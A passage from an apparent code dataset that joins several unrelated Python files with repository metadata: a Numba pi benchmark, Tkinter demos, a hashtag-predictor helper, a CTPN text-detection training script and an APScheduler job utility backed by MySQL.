@jit(nogil=True)
def nogil_monte_carlo_pi(nsamples):
    """Monte-Carlo pi estimate compiled with the GIL released during execution."""
    acc=0
    for i in range(nsamples):
        x=random.random()
        y=random.random()
        if (x**2+y**2)<1.0:
            acc+=1
    return 4.0*acc/nsamples
@jit(nogil=True,nopython=True)
def nogil_nopython_monte_carlo_pi(nsamples):
    """Monte-Carlo pi estimate: Numba nopython mode with the GIL released."""
    acc=0
    for i in range(nsamples):
        x=random.random()
        y=random.random()
        if (x**2+y**2)<1.0:
            acc+=1
    return 4.0*acc/nsamples
if __name__ == "__main__":
    nsamples = int(1e5)

    # Plain-Python baseline: a single timed run (no warm-up needed).
    tic = time.time()
    monte_carlo_pi(nsamples)
    print('nb ', time.time() - tic)

    # Each Numba variant is invoked once to trigger JIT compilation, then
    # timed on a second call so only steady-state execution is measured.
    for variant in (jit_monte_carlo_pi,
                    nopython_monte_carlo_pi,
                    nogil_monte_carlo_pi,
                    nogil_nopython_monte_carlo_pi):
        variant(nsamples)
        tic = time.time()
        variant(nsamples)
        print('nb ', time.time() - tic)
| [
"ijiangpeiyong@126.com"
] | ijiangpeiyong@126.com |
66b63ca00a999d2611f9e8483abd97da52d70e28 | 91e8200c790ef77a3f5401def4bbaea408e2cf6c | /Func_tuts/pFa.py | c12818a15b3ac27832cff15fbb32316940072ba0 | [] | no_license | mikel-codes/python_scripts | e3795629c5096d20c41fe3a13714e1519b59c1be | cf1a475c843c8e8e857229fbd3dc52525765f185 | refs/heads/main | 2023-06-23T07:02:59.385491 | 2021-07-24T08:12:49 | 2021-07-24T08:12:49 | 389,036,577 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 840 | py | from functools import partial #these tools help for customization of function
from operator import add, mul
import Tkinter
# NOTE: this is Python 2 code (print statements, Tkinter module name).
# Partial function application: pre-bind one operand of add/mul.
addQ = partial(add, 10)
mul100 = partial(mul, 100)
print addQ(20)
print mul100(18)
# Pre-bind the base keyword of int() to get a binary-string parser.
baseTwo = partial(int, base=2)
baseTwo.__doc__ = "converts to base 10 a binary"
print baseTwo('10001')
# GUI demo: a Button factory with default colors, overridable per call.
root = Tkinter.Tk()
Button = partial(Tkinter.Button, root, fg = "red", bg = "blue")
b1 = Button(text="Button 1", fg = "green")
b2 = Button(text= "Button 2", fg = "brown")
qb = Button(text= "QUIT", command= root.quit)
b1.pack()
b2.pack()
qb.pack(expand=True, fill=Tkinter.X)
root.title("Fun with PFA's")
root.mainloop()
# Global-rebinding demo: Foo() mutates the module-level `bar`.
bar = 1
def Foo():
    print "calling Foo() in __main__"
    global bar
    bar = 100
print "Note any changes after"
print "value of bar before Foo ", bar
Foo()
print "value of bar after Foo()", bar
| [
"gatez@yahoo.com"
] | gatez@yahoo.com |
59578622e0748a2eea98e10fbb3842e3303d2f6d | aea6e23c484ba615fb7e36752b36f9b018c60ae5 | /Predictor/predictor_helper.py | 6b78585abfb9e4ca1776fee0185d5053633158bf | [] | no_license | Hylian/Hashtagger | d7151796ff4d88fa675911442a4a15434e27d940 | 1322c321b3650f3cd3c6cab591cb0c70bb8ec8a5 | refs/heads/master | 2021-01-01T05:34:52.686700 | 2013-09-15T05:11:39 | 2013-09-15T05:11:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,825 | py | import numpy, pickle
from predictor import predictor_func
NUM_FILES = 100
freq = dict ()
words = []
examples = []
cur_example = 0
num_train = 1000
num_test = 1000
score = 0.0
#utilities
def checkChar (c):
    """Return True when *c* is a plain ASCII character (code point < 128)."""
    # ord() is never negative, so only the upper bound actually filters.
    return ord(c) < 128
def clean (word):
    """Return *word* with every non-ASCII character removed, as a str.

    BUG FIX: under Python 3 `filter()` returns an iterator, which has no
    .encode() method, so the original raised AttributeError.  Joining the
    kept characters and round-tripping through ASCII preserves the original
    intent (strip anything outside the ASCII range).
    """
    ret = "".join(ch for ch in word if ord(ch) < 128)
    return ret.encode("ascii", "ignore").decode("ascii")
def is_url (word):
    """Heuristic: treat any token starting with 'http' as a URL."""
    return word.startswith("http")
#input
def read_in (file_addr):
    """Load one pickled tweet file and append cleaned examples to `examples`.

    Each pickled entry is a (text_tokens, hashtags) pair; URL tokens are
    dropped from the text and every remaining token/hashtag is ASCII-cleaned.
    """
    data = pickle.load (open (file_addr, 'rb')) # NOTE(review): file handle is never closed
    words = [] # NOTE(review): unused local, shadows the module-level `words`
    global hdict # NOTE(review): `hdict` is never defined or used anywhere — dead declaration?
    for pair in data:
        text = pair [0]
        hashtags = pair [1]
        clean_text = []
        clean_hashtags = []
        for hashtag in hashtags:
            clean_hashtags.append (clean (hashtag))
        for word in text:
            if is_url (word): # drop URL tokens entirely
                continue
            clean_text.append (clean (word))
        examples.append ([clean_text, clean_hashtags])
def get_all_data ():
    """Populate the module-level `examples` list from every pickled source.

    Reads NUM_FILES scraper dumps plus the hand-picked CSV pickles; the
    commented-out lines are alternative topic corpora left for reference.
    """
    for i in range (NUM_FILES):
        read_in ('../scraper/tweets' + str (i))
    read_in ('../csvconvert/yolotweets.csv.pickle')
    #read_in ('../csvconvert/iphonetweets.csv.pickle')
    #read_in ('../csvconvert/educationtweets.csv.pickle')
    #read_in ('../csvconvert/newstweets.csv.pickle')
    read_in ('../csvconvert/syriatweets.csv.pickle')
    #read_in ('../csvconvert/economytweets.csv.pickle')
def get_example ():
    """Return the next training example, or False once num_train is reached.

    BUG FIX: the original assigned `cur_example += 1` without declaring the
    name global, which made `cur_example` local to the function and raised
    UnboundLocalError on the very first call.
    """
    global cur_example
    if (cur_example >= num_train):
        return False
    ex = examples [cur_example]
    cur_example += 1
    return ex
def run_tests ():
    """Score the predictor on the next example (log-likelihood style) and
    accumulate into the module-level `score`.

    BUG FIXES: `score` and `cur_example` are rebound here, so they must be
    declared global (the original raised UnboundLocalError); and `log` was
    never imported (NameError) — it is math.log.
    """
    from math import log
    global score, cur_example
    ex = examples [cur_example]
    distrib = predictor_func (ex [0])
    cur_score = 0
    for hashtag in distrib:
        if hashtag not in ex [1]:
            # Penalize probability mass assigned to absent hashtags.
            cur_score += log (1 - distrib [hashtag])
    for hashtag in ex [1]:
        if hashtag in distrib:
            cur_score += log (distrib [hashtag])
        else:
            # Large fixed penalty for a true hashtag the predictor missed.
            cur_score += -1000
    score += cur_score
    cur_example += 1
# Module-level side effect: all pickled tweet files are loaded into
# `examples` as soon as this module is imported.
get_all_data ()
| [
"rayli@Rays-MacBook-Air.local"
] | rayli@Rays-MacBook-Air.local |
2b9247f47cc8da5fb98b47c63dc13949cd8cd7e3 | 721459bf299f74db4983916e76bd756f4e338cf8 | /ctpn/main/train.py | e48534c93bf5dd03c2ea497191fec1a9568d4781 | [] | no_license | JACK1416/OCR | a9c515230781790b0d7149851b51d4772285db33 | a839f53158df8c63aa10ca269feabb5db556532f | refs/heads/master | 2020-04-26T08:44:48.554812 | 2019-03-02T10:35:47 | 2019-03-02T10:35:47 | 173,433,041 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,930 | py | # -*- coding: utf-8 -*-
import os
import sys
import time
import datetime
sys.path.append('..')
import tensorflow as tf
import numpy as np
import cv2 as cv
from nets.ctpn import ctpn
from nets.data_layer import DataLayer
from utils.loss import loss
tf.app.flags.DEFINE_float('learning_rate', 1e-5, '')
tf.app.flags.DEFINE_integer('max_steps', 500, '')
tf.app.flags.DEFINE_integer('decay_steps', 30000, '')
tf.app.flags.DEFINE_float('decay_rate', 0.1, '')
tf.app.flags.DEFINE_float('moving_average_decay', 0.997, '')
tf.app.flags.DEFINE_integer('num_readers', 4, '')
tf.app.flags.DEFINE_string('checkpoint_path', 'checkpoints_mlt/', '')
tf.app.flags.DEFINE_string('logs_path', 'logs_mlt/', '')
tf.app.flags.DEFINE_string('pretrained_model_path', None, '')
tf.app.flags.DEFINE_boolean('restore', False, '')
tf.app.flags.DEFINE_integer('save_checkpoint_steps', 500, '')
FLAGS = tf.app.flags.FLAGS
def main(self):
    """Build the CTPN training graph and run the optimization loop.

    Sets up placeholders, the Adam optimizer with moving-average variable
    updates, summaries, checkpoint saving/restoring, then trains for
    FLAGS.max_steps steps on batches from DataLayer.
    """
    # Per-run log directory stamped with the start time.
    now = datetime.datetime.now()
    format_time = now.strftime('%Y-%m-%d-%H-%M-%S')
    os.makedirs(FLAGS.logs_path + format_time)
    if not os.path.exists(FLAGS.checkpoint_path):
        os.makedirs(FLAGS.checkpoint_path)
    # Graph inputs: image batch, ground-truth boxes (x1,y1,x2,y2,cls),
    # and the image-shape vector.
    image = tf.placeholder(tf.float32, shape=[None, None, None, 3], name='image')
    bbox = tf.placeholder(tf.float32, shape=[None, 5], name='bbox')
    im_info = tf.placeholder(tf.float32, shape=[3], name='im_info')
    global_step = tf.get_variable('global_step', [], initializer=tf.constant_initializer(0), trainable=False)
    learning_rate = tf.Variable(FLAGS.learning_rate, trainable=False)
    opt = tf.train.AdamOptimizer(learning_rate)
    with tf.name_scope('ctpn') as scope:
        bbox_pred, cls_pred = ctpn(image)
        total_loss, model_loss, rpn_cross_entropy, rpn_loss_box = \
            loss(bbox_pred, cls_pred, bbox, im_info)
        # Batch-norm statistics updates collected under this scope.
        batch_norm_updates_op = tf.group(*tf.get_collection(tf.GraphKeys.UPDATE_OPS, scope))
        grads = opt.compute_gradients(total_loss)
        apply_gradient_op = opt.apply_gradients(grads, global_step=global_step)
    summary_op = tf.summary.merge_all()
    # Exponential moving averages of trainable variables, applied together
    # with the gradient step and BN updates below.
    variable_averages = tf.train.ExponentialMovingAverage(
        FLAGS.moving_average_decay, global_step)
    variables_averages_op = variable_averages.apply(tf.trainable_variables())
    with tf.control_dependencies([variables_averages_op, apply_gradient_op, batch_norm_updates_op]):
        train_op = tf.no_op(name='train_op')
    saver = tf.train.Saver(tf.global_variables(), max_to_keep=100)
    summary_writer = tf.summary.FileWriter(FLAGS.logs_path + format_time, tf.get_default_graph())
    init = tf.global_variables_initializer()
    if FLAGS.pretrained_model_path is not None:
        # NOTE(review): `slim` is never imported in this file — this branch
        # raises NameError when pretrained_model_path is set; confirm the
        # missing `tensorflow.contrib.slim` import upstream.
        variable_restore_op = slim.assign_from_checkpoint_fn(FLAGS.pretrained_model_path,
                                                             slim.get_trainable_variables(),
                                                             ignore_missing_vars=True)
    config = tf.ConfigProto()
    config.allow_soft_placement = True
    with tf.Session(config=config) as sess:
        if FLAGS.restore:
            # Resume from the latest checkpoint; the step count is parsed
            # from the checkpoint filename ('ctpn_<step>.ckpt').
            ckpt = tf.train.latest_checkpoint(FLAGS.checkpoint_path)
            restore_step = int(ckpt.split('.')[0].split('_')[-1])
            print("continue training from previous checkpoint {}".format(restore_step))
            saver.restore(sess, ckpt)
        else:
            sess.run(init)
            restore_step = 0
            if FLAGS.pretrained_model_path is not None:
                variable_restore_op(sess)
        data_layer = DataLayer('../../data/mlt/')
        data_generator = data_layer.generator()
        start = time.time()
        for step in range(restore_step, FLAGS.max_steps):
            data = next(data_generator)
            ml, tl, _, summary_str = sess.run([model_loss, total_loss, train_op, summary_op],
                                              feed_dict={image: data[0],
                                                         bbox: data[1],
                                                         im_info: data[2]})
            summary_writer.add_summary(summary_str, global_step=step)
            # Staircase learning-rate decay every decay_steps steps.
            if step != 0 and step % FLAGS.decay_steps == 0:
                sess.run(tf.assign(learning_rate, learning_rate.eval() * FLAGS.decay_rate))
            if step % 10 == 0:
                avg_time_per_step = (time.time() - start) / 10
                start = time.time()
                print('Step {:06d}, model loss {:.4f}, total loss {:.4f}, {:.2f} seconds/step, LR: {:.6f}'.format(
                    step, ml, tl, avg_time_per_step, learning_rate.eval()))
            if (step + 1) % FLAGS.save_checkpoint_steps == 0:
                filename = ('ctpn_{:d}'.format(step + 1) + '.ckpt')
                filename = os.path.join(FLAGS.checkpoint_path, filename)
                saver.save(sess, filename)
                print('Write model to: {:s}'.format(filename))
if __name__ == '__main__':
    # tf.app.run() parses the FLAGS defined above and invokes main().
    tf.app.run()
| [
"apple@Macbook.local"
] | apple@Macbook.local |
8be890fee96f1b20a72ee0e5a12994463dacff69 | 77df49e20d8f2e95a349758c92c7cef7afaddb80 | /gameinterface.py | e4fdc718c0b338c1a15f2ad944bf1584c0b98333 | [] | no_license | LarsLKarlsson68/Italian-Dungeons | 7b32b7623e71822fc4f412b93a972455bdf9b1a9 | 0bef22d97d4774b4f5bef4489e17b0833cede4cd | refs/heads/master | 2021-01-15T16:10:12.014995 | 2017-08-08T15:54:32 | 2017-08-08T15:54:32 | 99,709,382 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,286 | py | # -*- coding: latin_1 -*-
import tkinter
import _thread
import tkinter.filedialog
#import Image
#import ImageTk
class GameInterface(tkinter.Frame):
    """Tkinter game UI: a tiled map canvas plus a text log and input entry.

    Designed for a two-thread setup: a game thread queues updates via
    add_update()/prn()/pr()/prim() and blocks in get_input(), while the Tk
    main loop drains the queue in update_map_and_text() every 100 ms.
    `mutex` guards the update queue; `input_lock` is held until the player
    submits a line (or a file dialog completes), at which point it is
    released to wake the game thread.
    """
    def __init__(self,xsize=10,ysize=10,tilesize=10):
        print("Entering GameInterface.init")
        tkinter.Frame.__init__(self,None)
        # NOTE(review): height uses xsize, not ysize — looks like a bug for
        # non-square maps; confirm intended canvas dimensions.
        self.canvas = tkinter.Canvas(self,width=xsize*tilesize,height=xsize*tilesize,bg='black')
        self.canvas.pack(expand=1,anchor=tkinter.CENTER,side=tkinter.LEFT)
        self.text = tkinter.Text(self,width=60,height=24,font="Times 14",wrap=tkinter.WORD)
        self.text.pack()
        self.input = tkinter.Entry(self,width=53,font="Times 14 bold")
        self.input.pack()
        self.input.bind('<Return>', self._has_input)
        self.pack()
        # Map geometry (in tiles/pixels) and the current scroll offset.
        self.xsize=xsize
        self.ysize=ysize
        self.tilesize=tilesize
        self.xoffset = 0
        self.yoffset = 0
        # input_lock starts held: get_input() blocks until the player types.
        self.input_lock = _thread.allocate_lock()
        self.mutex = _thread.allocate_lock()
        self.input_lock.acquire()
        self.update_queue = []
        self.updates_ready_flag = False
        self.text_entered = ''
        # Kick off the periodic queue-draining loop (reschedules itself).
        self.update_map_and_text()
        # Text tags give bold/italic/roman styling for prn()/pr() output.
        self.text.tag_config("<bf>",font="Times 14 bold")
        self.text.tag_config("<it>",font="Times 14 italic")
        self.text.tag_config("<rm>",font="Times 14")
        self.tag_list = ["<bf>","<it>","<rm>"]
        # Cache of loaded PhotoImages, keyed by filename (and tile coords).
        self.image_repository = dict()
        print("Exiting GameInterface.init")
        self.tkraise()
    def add_update(self,update):
        """Queue one update tuple for the GUI thread (thread-safe)."""
        self.mutex.acquire()
        self.update_queue += [update]
        self.mutex.release()
    def updates_ready(self):
        """Signal the GUI thread that the queued updates may be applied."""
        self.mutex.acquire()
        self.updates_ready_flag = True
        self.mutex.release()
    def update_map_and_text(self):
        """Drain the update queue on the Tk thread; reschedules itself every 100 ms."""
        self.mutex.acquire()
        if self.updates_ready_flag:
            for u in self.update_queue:
                # Each update is a tuple whose first element selects the action.
                if u[0] == 'clear':
                    self.clear_map_foreground()
                elif u[0] == 'center':
                    self.center_map(u[1],u[2])
                elif u[0] in ('foreground','background'):
                    self.add_to_map(u[1],u[2],u[3],u[0])
                elif u[0] == 'text':
                    self.text.insert(tkinter.END,u[1],u[2])
                    self.text.see(tkinter.END)
                elif u[0] == 'textimage':
                    image = self.get_image(u[1])
                    self.text.image_create(tkinter.END,image=image)
                    self.text.see(tkinter.END)
                elif u[0] == 'newmap':
                    self.new_map(u[1])
                elif u[0] == 'quit':
                    print('Bye!')
                    self.destroy()
                elif u[0] == 'savefile':
                    # File dialogs run here (Tk thread); releasing input_lock
                    # wakes the game thread blocked in ask_for_save_file().
                    self.text_entered = tkinter.filedialog.asksaveasfilename(parent=self,initialdir="./saved",title='Please provide a file to save in')
                    self.input_lock.release()
                elif u[0] == 'loadfile':
                    self.text_entered = tkinter.filedialog.askopenfilename(parent=self,initialdir="./saved",title='Please select a file to load')
                    self.input_lock.release()
            self.update_queue = []
            self.updates_ready_flag = False
        self.mutex.release()
        self.after(100,self.update_map_and_text)
    def add_to_map(self,image,xpos,ypos,tag):
        """Draw a tile at map coords (xpos, ypos): an image file or a color name."""
        # Translate map coordinates into the current view.
        xpos = xpos-self.xoffset
        ypos = ypos-self.yoffset
        if '.' in image: #isinstance(image,tkinter.PhotoImage):
            image = self.get_image(image)
            self.canvas.create_image(int(xpos*self.tilesize),int(ypos*self.tilesize),
                image=image, anchor=tkinter.NW,
                tag=tag)
        else: # Color code given
            self.canvas.create_rectangle(xpos*self.tilesize,ypos*self.tilesize,
                ((xpos+1)*self.tilesize-1),((ypos+1)*self.tilesize-1),
                fill=image,outline=image,tag=tag)
    def get_image(self,image_name):
        """Return the cached PhotoImage for image_name, loading/cropping on miss.

        Names of the form "file[x,y]" denote one tile cut from a sprite sheet.
        """
        try:
            image = self.image_repository[image_name]
        except KeyError:
            image_filename,x,y=split_filename(image_name)
            try:
                image = self.image_repository[image_filename]
            except KeyError:
                image = tkinter.PhotoImage(file=image_filename)
                self.image_repository[image_filename] = image
            if x or y:
                image = subimage(image,x*self.tilesize,y*self.tilesize,(x+1)*self.tilesize,(y+1)*self.tilesize)
            self.image_repository[image_name] = image
        return image
    def center_map(self,xpos,ypos):
        """Scroll the canvas so map coords (xpos, ypos) sit at the view center."""
        xoffset = xpos-(self.xsize/2)
        yoffset = ypos-(self.ysize/2)
        self.canvas.move('background',self.tilesize*(self.xoffset-xoffset),self.tilesize*(self.yoffset-yoffset))
        self.canvas.move('foreground',self.tilesize*(self.xoffset-xoffset),self.tilesize*(self.yoffset-yoffset))
        self.xoffset =xoffset
        self.yoffset =yoffset
    def clear_map_foreground(self):
        """Remove every canvas item tagged 'foreground' (movable sprites)."""
        self.canvas.delete('foreground')
    def new_map(self,image_array):
        """Replace the whole map with image_array (rows of tile specs or falsy)."""
        self.canvas.delete('foreground')
        self.canvas.delete('background')
        self.xoffset = 0
        self.yoffset = 0
        for y in range(len(image_array)):
            for x in range(len(image_array[y])):
                if image_array[y][x]:
                    self.add_to_map(image_array[y][x],x,y,'background')
    def _has_input(self,event):
        """<Return> handler: hand the entry text to the waiting game thread."""
        if(self.input_lock.locked()):
            self.text_entered = self.input.get() #.encode('latin-1')
            if self.text_entered:
                self.input.delete('0',tkinter.END)
                self.input_lock.release()
    def get_input(self):
        """Block (on the game thread) until the player submits a line; return it."""
        self.input_lock.acquire()
        return self.text_entered
    def prn(self,*strings):
        """Queue the arguments as one text line (with trailing newline).

        Arguments matching a style tag ("<bf>"/"<it>"/"<rm>") select the
        font for the whole line instead of being printed.
        """
        self.mutex.acquire()
        l = len(strings)
        string = ''
        tags = tuple()
        for i in range(l):
            if strings[i] in self.tag_list:
                tags += (strings[i],)
            else:
                string += string_when_needed(strings[i])
                if i+1 == l:
                    string += '\n'
                else:
                    string += ' '
        self.update_queue += [('text',string,tags)]
        self.updates_ready_flag = True
        self.mutex.release()
    def pr(self,*strings):
        """Like prn(), but without a trailing newline."""
        self.mutex.acquire()
        l = len(strings)
        string = ''
        tags = tuple()
        for i in range(l):
            if strings[i] in self.tag_list:
                tags += (strings[i],)
            else:
                string += string_when_needed(strings[i])+' '
        self.update_queue += [('text',string,tags)]
        self.updates_ready_flag = True
        self.mutex.release()
    def prim(self,image):
        """Queue an inline image to be inserted into the text log."""
        self.mutex.acquire()
        self.update_queue += [('textimage',image)]
        self.updates_ready_flag = True
        self.mutex.release()
    def guiquit(self):
        """Terminate the Tk main loop."""
        print('Bye!')
        self.quit()
    def ask_for_load_file(self):
        """Request a load-file dialog and block until the player picks a path."""
        self.mutex.acquire()
        self.update_queue += [('loadfile',)]
        self.updates_ready_flag = True
        self.mutex.release()
        self.input_lock.acquire()
        return self.text_entered
    def ask_for_save_file(self):
        """Request a save-file dialog and block until the player picks a path."""
        self.mutex.acquire()
        self.update_queue += [('savefile',)]
        self.updates_ready_flag = True
        self.mutex.release()
        self.input_lock.acquire()
        return self.text_entered
def string_when_needed(obj):
    """Return *obj* unchanged when it is already a str, else its str() form."""
    return obj if isinstance(obj, str) else str(obj)
# Takes a file name "<name>[<int1>,<int2>]" (or a plain "<name>")
# and returns (<name>, <int1>, <int2>), defaulting the ints to 0.
def split_filename(fn):
    """Split a "name[x,y]" sprite-sheet reference into (name, x, y).

    ROBUSTNESS FIX: the original located the comma with fn.find(','), which
    picked up any comma inside the base name and produced an invalid slice;
    parsing only the part after '[' avoids that.
    """
    if '[' not in fn:
        return fn, 0, 0
    name, _, coords = fn.partition('[')
    x_str, _, y_str = coords[:-1].partition(',')
    return name, int(x_str), int(y_str)
# To get a rectangular subimage of an existing image
def subimage(src, l, t, r, b):
    """Return a new PhotoImage copied from the (l, t)-(r, b) region of *src*.

    Uses Tk's 'copy' image subcommand directly; *src* must be a
    tkinter.PhotoImage and a Tk interpreter must be running.
    """
    dst = tkinter.PhotoImage()
    dst.tk.call(dst, 'copy', src, '-from', l, t, r, b, '-to', 0, 0)
    return dst
| [
"lars.karlsson@oru.se"
] | lars.karlsson@oru.se |
5eeaa7ec503906bf393cfbde66233d04a3698f41 | 6d11f214381fa4ca8c27e779ae988dd47cce322b | /com_donot_use/port8/core_old/schedutility.py | 00df3949f1c94f2edc6d71c18842d3d3ed7ab41a | [] | no_license | myuconnect/Port8 | d4e0d8fd53adb625e3a80f8a44e44095e2f03262 | eb28211b18c0178820ee14e32606ed223761671f | refs/heads/master | 2020-03-19T02:42:21.700013 | 2018-09-12T01:45:24 | 2018-09-12T01:45:24 | 135,512,706 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,586 | py | from apscheduler.schedulers.background import BackgroundScheduler
from apscheduler.schedulers.blocking import BlockingScheduler
from com.port8.core.singleton import Singleton
from com.port8.core.globals import Global
from com.port8.core.utils import Utility
from com.port8.core.error import *
from com.port8.core.infrautils import InfraUtility
from com.port8.db.dbmysql import DBMySql
import os, sys, time, random, datetime, json
class SchedUtility(object, metaclass=Singleton):
    """Singleton facade around an APScheduler instance plus the scheduler's
    MySQL job tables (ScheduledJobs / ScheduledJobsRunLog)."""

    def __init__(self):
        """Wire up Global/Utility/Infra/DB helpers, then start the scheduler."""
        try:
            self.Global = Global()
            self.Utility = Utility()
            self.InfraUtil = InfraUtility()
            self.db = DBMySql('Scheduler')
            self.myModulePyFile = os.path.abspath(__file__)
            self.myClass = self.__class__.__name__
            #Setting the infrastructure
            self.Infra = self.InfraUtil.setInfra(self.Global.SchedulerInfraKey)
            if not self.Infra:
                raise InfraInitializationError('Could not initialize {cls}'.format(cls=(self.myModulePyFile,self.myClass)))
            # we need to get the proper logger for a given module
            self.logger = self.Infra.getInfraLogger(self.Global.SchedulerInfraKey)
            # loading Schduler config and starting scheduler
            self.__startScheduler__()
        except Exception as err:
            raise err

    def __startScheduler__(self):
        """Build a Background/Blocking scheduler from the infra config and start
        it (paused unless the default scheduler mode is 'Run')."""
        try:
            mySchedulerType = self.Global.DefaultSchedulerType
            mySchedulerMode = self.Global.DefaultSchedulerMode
            if mySchedulerMode == 'Run':
                myArgPaused = False
            else:
                myArgPaused = True
            #fi
            mySchedulerConfig = self.Utility.getACopy(self.Infra.schedulerConfigData)
            if mySchedulerType == 'Background':
                self.Scheduler = BackgroundScheduler(mySchedulerConfig)
            else:
                self.Scheduler = BlockingScheduler(mySchedulerConfig)
            #fi
            if not self.Scheduler.running:
                self.Scheduler.start(paused = myArgPaused)
        except Exception as err:
            raise err

    def getAllJobDetail(self):
        '''
        Description: Returns the state dicts of all jobs stored in the scheduler
        '''
        myJobDetail = []
        for job in self.Scheduler.get_jobs():
            myJobDetail.append(self.getAJobDetail(job.id))
        return myJobDetail

    def getAJobDetail(self, jobIdArg):
        '''
        Description: Returns the state dict of a single scheduled job
        '''
        myJobId = jobIdArg
        job = self.Scheduler.get_job(myJobId)
        myJobDetail = job.__getstate__()
        return myJobDetail

    def suspendJob(self, jobIdArg):
        """Pause the given scheduler job (it stays registered but will not fire)."""
        myJobId = jobIdArg
        job = self.Scheduler.get_job(myJobId)
        job.pause()

    def resumeJob(self, jobIdArg):
        """Resume a previously paused scheduler job."""
        myJobId = jobIdArg
        job = self.Scheduler.get_job(myJobId)
        job.resume()

    def getCurrentlyExecutingJob(self):
        # NOTE(review): despite the name, this returns the count of ALL
        # registered jobs, not only those currently executing — confirm intent.
        return len(self.Scheduler.get_jobs())

    def removeJob(self, jobId):
        """Remove a job from the scheduler; prints a warning for unknown ids."""
        try:
            self.Scheduler.remove_job(jobId)
        except JobLookupError as err:
            # presumably JobLookupError comes in via `from com.port8.core.error import *`
            print('Invalid Job !!')

    def removeAllJobs(self):
        """Remove every job registered with the scheduler."""
        try:
            self.Scheduler.remove_all_jobs()
        except Exception as err:
            raise err

    def getAllJobsFromRep(self):
        """Debug helper: print every job and its scheduler-side detail."""
        for job in self.Scheduler.get_jobs():
            myJobDetail = self.Scheduler.get_job(job.id)
            print(job,myJobDetail)

    def getNewJob(self,prefixArg):
        """Build a (mostly) unique job id: optional prefix + timestamp + 2-digit random."""
        # random number between 10 and 99 to ensure we always get 2 digit
        if isinstance(prefixArg,str) and prefixArg is not None:
            return prefixArg + '_' + str(datetime.datetime.fromtimestamp(time.time()).strftime('%Y%m%d_%-H%M%S_') + str(random.randrange(10,99)))
        else:
            return datetime.datetime.fromtimestamp(time.time()).strftime('%Y%m%d_%-H%M%S_') + str(random.randrange(10,99))

    def getJobInfoFromDb(self, jobIdArg):
        """Fetch the ScheduledJobs row for *jobIdArg*; on error returns a
        response template marked unsuccessful."""
        try:
            myResponse = self.Utility.getResponseTemplate()
            myJobId = self.Utility.getACopy(jobIdArg)
            self.logger.debug('arg [{arg}] received'.format(arg = myJobId))
            myJobCriteria = 'JobId = %s ' %repr(myJobId)
            return self.db.processDbRequest(operation = self.Global.fetch, container = 'ScheduledJobs', contents = ['*'], criteria = myJobCriteria)
        except Exception as err:
            myErrorMsg, myTraceback = self.Utility.getErrorTraceback()
            # NOTE(review): logger.error is given the prefix as the format string
            # and the message as a %-argument; if the prefix has no placeholder
            # the message is dropped — confirm intended logging call shape.
            self.logger.error(self.Global.DefPrefix4Error * self.Global.DefPrefixCount , myErrorMsg)
            self.logger.error(self.Global.DefPrefix4Error * self.Global.DefPrefixCount , myTraceback)
            self.Utility.buildResponse(myResponse, self.Global.UnSuccess,myErrorMsg)
            return myResponse

    def getNextSeqForJob(self, jobIdArg):
        """Return 1 + the number of ScheduledJobsRunLog rows for this job,
        i.e. the sequence number the next run should use."""
        try:
            myResponse = self.Utility.getResponseTemplate()
            myJobId = self.Utility.getACopy(jobIdArg)
            self.logger.debug('arg [{arg}] received'.format(arg = myJobId))
            myJobCriteria = 'JobId = %s ' %repr(myJobId)
            return self.db.getTotalRowCount(container = 'ScheduledJobsRunLog', criteria = myJobCriteria) + 1
        except Exception as err:
            myErrorMsg, myTraceback = self.Utility.getErrorTraceback()
            self.logger.error(self.Global.DefPrefix4Error * self.Global.DefPrefixCount , myErrorMsg)
            self.logger.error(self.Global.DefPrefix4Error * self.Global.DefPrefixCount , myTraceback)
            return myErrorMsg

    def getCurrentSeqForJob(self, jobIdArg):
        """Return the number of ScheduledJobsRunLog rows for this job,
        i.e. the sequence number of the most recent run."""
        try:
            myResponse = self.Utility.getResponseTemplate()
            myJobId = self.Utility.getACopy(jobIdArg)
            self.logger.debug('arg [{arg}] received'.format(arg = myJobId))
            myJobCriteria = 'JobId = %s ' %repr(myJobId)
            return self.db.getTotalRowCount(container = 'ScheduledJobsRunLog', criteria = myJobCriteria)
        except Exception as err:
            myErrorMsg, myTraceback = self.Utility.getErrorTraceback()
            self.logger.error(self.Global.DefPrefix4Error * self.Global.DefPrefixCount , myErrorMsg)
            self.logger.error(self.Global.DefPrefix4Error * self.Global.DefPrefixCount , myTraceback)
            return myErrorMsg

    def getElapsedStatsForJob(self, jobIdArg):
        """NOTE(review): body is identical to getCurrentSeqForJob (a row count),
        not elapsed-time statistics — looks like an unfinished copy/paste."""
        try:
            myResponse = self.Utility.getResponseTemplate()
            myJobId = self.Utility.getACopy(jobIdArg)
            self.logger.debug('arg [{arg}] received'.format(arg = myJobId))
            myJobCriteria = 'JobId = %s ' %repr(myJobId)
            return self.db.getTotalRowCount(container = 'ScheduledJobsRunLog', criteria = myJobCriteria)
        except Exception as err:
            myErrorMsg, myTraceback = self.Utility.getErrorTraceback()
            self.logger.error(self.Global.DefPrefix4Error * self.Global.DefPrefixCount , myErrorMsg)
            self.logger.error(self.Global.DefPrefix4Error * self.Global.DefPrefixCount , myTraceback)
            return myErrorMsg

    def processJobStartEvent(self, jobIdArg):
        '''
        1. Mark job started in ScheduledJobs
        2. Create new entry for this job in ScheduledJobsRunLog
        '''
        try:
            # initializing
            myResponse = self.Utility.getResponseTemplate()
            myJobId = self.Utility.getACopy(jobIdArg)
            self.logger.debug('arg [{arg}] received'.format(arg=myJobId))
            myJobDetailsFromDb = self.getJobInfoFromDb(myJobId)['Data']
            if myJobDetailsFromDb:
                # building data for SchedulerJobsRunLog
                myJobCriteria = ' JobId = %s' %repr(myJobId)
                myNextSeqForJob = self.getNextSeqForJob(myJobId)
                # will mark the job started and creat the run log for this run
                self.db.processDbRequest(operation='change', container='ScheduledJobs', \
                    dataDict={'Status': 'Executing'}, criteria = myJobCriteria, commitWork=True )
                # creating run information
                self.db.processDbRequest(operation='create', container='ScheduledJobsRunLog', \
                    dataDict={'JobId':myJobId, 'Seq' : myNextSeqForJob, 'ExecutionStarted': self.Utility.getCurrentTime()}, commitWork=True )
                self.Utility.buildResponse(myResponse, self.Global.Success, self.Global.Success, {'Seq':myNextSeqForJob})
            else:
